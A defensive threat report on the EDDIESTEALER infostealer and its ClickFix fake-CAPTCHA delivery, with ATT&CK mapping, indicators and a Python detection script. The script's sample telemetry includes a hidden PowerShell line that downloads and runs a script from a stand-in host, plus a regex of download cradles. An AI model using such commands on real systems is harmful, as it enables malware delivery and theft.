Full Report
A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as
Analysis Summary
# Tool/Technique: EDDIESTEALER
## Overview
EDDIESTEALER is a newly observed information stealer written in Rust. It is delivered through the ClickFix social engineering tactic: a fake CAPTCHA verification page instructs the victim to paste a command into the Windows Run dialog, which executes an obfuscated PowerShell script that downloads and runs the stealer. Once running, it harvests credentials, browser data (passwords, cookies), cryptocurrency wallet details and other sensitive data from the host and sends it to a command and control (C2) server.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by PowerShell, `cscript` and Win32 API usage)
- Capabilities: credential and data theft, C2 tasking, encrypted exfiltration, anti-analysis and self-deletion, bypass of Chromium app-bound encryption.
- First Seen: May 2025 (inferred from related reporting context)
## MITRE ATT&CK Mapping
- T1566 - Phishing (only if the lure page is reached through a phishing message; the report does not say how victims arrive at the fake CAPTCHA page)
- T1204 - User Execution
- T1204.004 - User Execution: Malicious Copy and Paste (the victim pastes the ClickFix command into the Windows Run dialog)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.007 - Command and Scripting Interpreter: JavaScript (`gverify.js` run by `cscript`)
- T1027 - Obfuscated Files or Information (obfuscated PowerShell command, encrypted strings in the binary)
- T1106 - Native API (custom WinAPI lookup, direct `kernel32.dll` file reads)
- T1105 - Ingress Tool Transfer (downloading the script and the stealer)
- T1497 - Virtualization/Sandbox Evasion (self-deletes when a sandbox is detected)
- T1070.004 - Indicator Removal: File Deletion (self-deletion via NTFS Alternate Data Stream renaming)
- T1082 - System Information Discovery (system metadata collection)
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers (the ChromeKatz logic reads the browser process's memory rather than injecting code into it, so T1055 Process Injection does not apply)
- T1005 - Data from Local System (cryptocurrency wallet, FTP client and messaging application data)
- T1074 - Data Staged
- T1071.001 - Application Layer Protocol: Web Protocols (HTTP POST to the C2)
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Gathers system metadata, cryptocurrency wallet details, browser information (passwords, cookies), FTP client data, and messaging application data.
- Receives dynamic tasks from a Command & Control (C2) server.
- Uses standard `kernel32.dll` functions (`CreateFileW`, `GetFileSizeEx`, `ReadFile`, `CloseHandle`) to read targeted files.
- Encrypts collected host information before exfiltrating it to the C2 via HTTP POST requests.
- Employs string encryption and a custom WinAPI lookup mechanism for resolving API calls at runtime, which keeps the import table and embedded strings from revealing its capabilities.
- Creates a mutex so that only one instance runs at a time.
### Advanced Features
- **Anti-Analysis/Evasion:** Checks for sandbox indicators and self-deletes when it believes it is being analysed. The self-deletion works while the executable is still running: the file's primary data stream is renamed to an NTFS Alternate Data Stream and the file is then marked for deletion, which sidesteps the lock Windows normally holds on a running executable's image file.
- **Bypassing Chrome Encryption:** Implements a Rust port of **ChromeKatz** to defeat Chromium's app-bound encryption. Instead of decrypting the on-disk cookie database, it reads the already-decrypted data (such as cookies) directly from the memory of the browser's network service process.
- **Chrome Data Exfiltration Enhancement:** If no target Chromium browser is running, the stealer launches its own instance, positioned off-screen so the victim never sees it, and reads the memory of that instance's network service child process to extract credentials and cookies.
- **Headless Browser Interaction:** Launches the Chrome process with `--remote-debugging-port=[port]`, which exposes the DevTools Protocol on a local port and lets the stealer drive the browser without a visible window.
- **Configuration Update:** Newer variants send host information to the C2 before receiving their task configuration, and use a hard-coded encryption key instead of fetching the key from the server.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Pseudorandom 12-character file name (in Downloads folder)
- Registry Keys: [Not provided in the context]
- Network Indicators: C2 server located at `llll[.]fit` (defanged)
- Behavioral Indicators: Execution of obfuscated PowerShell from the Windows Run dialog (a child of `explorer.exe`) following the fake CAPTCHA interaction; `cscript` running the downloaded JavaScript (`gverify.js`) with a hidden window; a Chromium browser launched with `--remote-debugging-port` by a non-browser parent; reads of Chromium process memory matching ChromeKatz behaviour.
## Associated Threat Actors
- [Not explicitly named, but associated with campaigns leveraging the ClickFix social engineering tactic.]
## Detection Methods
- `cscript.exe` (or `wscript.exe`) executing a `.js` file from a user-writable location such as `%TEMP%`, `Downloads` or `AppData` (the initial `gverify.js` payload).
- PowerShell spawned by `explorer.exe` (the Run dialog) whose command line contains a download cradle or encoded command; this is the ClickFix paste and is the earliest point at which the chain can be stopped.
- Executables with a 12-character pseudorandom name in the `Downloads` folder. On its own this is low fidelity (installers and updaters use random names too), so treat it as corroboration for the process-tree signals rather than as a standalone alert.
- A Chromium browser (`chrome.exe`, `msedge.exe`, `brave.exe`) started by a non-browser parent with `--remote-debugging-port`, and cross-process memory reads of the browser's network service process (ChromeKatz behaviour).
- Mutex creation by EDDIESTEALER. The report does not publish the mutex name, so a rule on it has to be derived from a sample; until then, rely on the behavioural signals above.
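The process-creation rules above, as an added Python example that is not part of the original report: it runs four rules over constructed Sysmon-style process-creation records (Image, ParentImage, CommandLine) and escalates only when more than one strong signal fires on the same host. The host names, file paths, sample command lines, the 12-character file name and the `--window-position` argument on the hidden browser are all my assumptions, as are the `triage` thresholds.

```python
"""Process-creation rules for the EDDIESTEALER ClickFix chain.

Added example, not from the original report. Events mimic Sysmon Event ID 1
fields; all sample telemetry below is constructed for the example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# PowerShell download cradles and encoded commands. "-e" counts only as a whole
# argument (preceded by whitespace, followed by a word boundary), so "-exec"
# does not match.
CRADLE = re.compile(
    r"(?:\biwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|(?<=\s)-e(?:nc|ncodedcommand)?\b)", re.I)
USER_WRITABLE = re.compile(r"\\(?:temp|downloads|appdata)\\", re.I)
RANDOM_12_EXE = re.compile(r"^[a-z0-9]{12}\.exe$")  # basename() lowercases first
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}


def rule_run_dialog_powershell(e: ProcEvent) -> bool:
    """Win+R children run under explorer.exe; a cradle there is the ClickFix paste."""
    return (basename(e.parent_image) == "explorer.exe"
            and basename(e.image) in {"powershell.exe", "pwsh.exe"}
            and CRADLE.search(e.command_line) is not None)


def rule_cscript_js_from_user_path(e: ProcEvent) -> bool:
    """cscript/wscript running a .js dropped in Temp, Downloads or AppData."""
    return (basename(e.image) in {"cscript.exe", "wscript.exe"}
            and re.search(r"\.js\b", e.command_line, re.I) is not None
            and USER_WRITABLE.search(e.command_line) is not None)


def rule_browser_remote_debugging(e: ProcEvent) -> bool:
    """Chromium started with the DevTools port by neither the browser nor the shell."""
    return (basename(e.image) in BROWSERS
            and basename(e.parent_image) not in BROWSERS | {"explorer.exe"}
            and "--remote-debugging-port=" in e.command_line.lower())


def rule_random_name_in_downloads(e: ProcEvent) -> bool:
    """12 pseudorandom characters in Downloads: weak alone, useful as corroboration."""
    return ("\\downloads\\" in e.image.lower()
            and RANDOM_12_EXE.match(basename(e.image)) is not None)


RULES = {
    "browser_remote_debugging_by_non_browser": rule_browser_remote_debugging,
    "cscript_js_from_user_path": rule_cscript_js_from_user_path,
    "random_12char_exe_in_downloads": rule_random_name_in_downloads,
    "run_dialog_powershell_cradle": rule_run_dialog_powershell,
}
WEAK_RULES = {"random_12char_exe_in_downloads"}


def analyze(events):
    """Map each host to the sorted names of the rules that fired on it."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e.host].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def triage(findings):
    """Escalate when the chain is visible; a weak rule alone is only informational."""
    verdicts = {}
    for host, names in findings.items():
        strong = [n for n in names if n not in WEAK_RULES]
        verdicts[host] = "alert" if len(strong) >= 2 else ("review" if strong else "info")
    return verdicts


# Constructed sample telemetry. HOST-A replays the reported chain; HOST-B is benign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CSCRIPT = r"C:\Windows\System32\cscript.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
STEALER = r"C:\Users\alice\Downloads\k3q9zp2wbx7m.exe"   # hypothetical 12-char name

SAMPLE_EVENTS = [
    ProcEvent("HOST-A", PS, EXPLORER,
              r'powershell -w hidden -c "iwr http://example.invalid/v -OutFile '
              r'$env:TEMP\gverify.js; cscript //nologo $env:TEMP\gverify.js"'),
    ProcEvent("HOST-A", CSCRIPT, PS,
              r"cscript //nologo C:\Users\alice\AppData\Local\Temp\gverify.js"),
    ProcEvent("HOST-A", STEALER, CSCRIPT, f'"{STEALER}"'),
    # --window-position is an assumption of how an off-screen instance would appear.
    ProcEvent("HOST-A", CHROME, STEALER,
              f'"{CHROME}" --remote-debugging-port=9222 --window-position=-32000,-32000'),
    ProcEvent("HOST-B", PS, EXPLORER,
              r"powershell -NoProfile -Command Get-ChildItem C:\Users\bob\Downloads"),
    ProcEvent("HOST-B", CHROME, EXPLORER, f'"{CHROME}" --profile-directory=Default'),
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for host, verdict in triage(found).items():
        print(host, verdict, found[host])
```

The browser rule will also fire on legitimate automation (Selenium, Puppeteer and similar tools launch Chromium with `--remote-debugging-port` from a non-browser parent), so in production it should be scoped to hosts or users where such tooling is not expected, or combined with the other rules as `triage` does.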
## Mitigation Strategies
- User education against deceptive social engineering tactics like ClickFix, particularly avoiding pasting or running commands from untrusted sources into the Windows Run dialog.
- Monitor and restrict execution of PowerShell scripts downloaded via web browser user interaction.
- For analysis, run samples in sandboxes that mask common sandbox indicators so the stealer does not self-delete before revealing its behaviour; this is an analyst aid rather than a production control.
- Harden browser security and alert on suspicious browser process creation: Chromium browsers launched by a non-browser parent, started with `--remote-debugging-port`, or placed off-screen, and cross-process memory reads against browser processes.
## Related Tools/Techniques
- **ClickFix:** The social engineering delivery technique used to initiate execution.
- **ChromeKatz (Rust implementation):** The specific technique/module used to bypass Chromium encryption.
- **Katz Stealer:** A related stealer family that also circumvents Chrome app-bound encryption, but via DLL injection.
- **Latrodectus:** Mentioned as exhibiting similar self-deletion techniques using NTFS Alternate Data Streams renaming.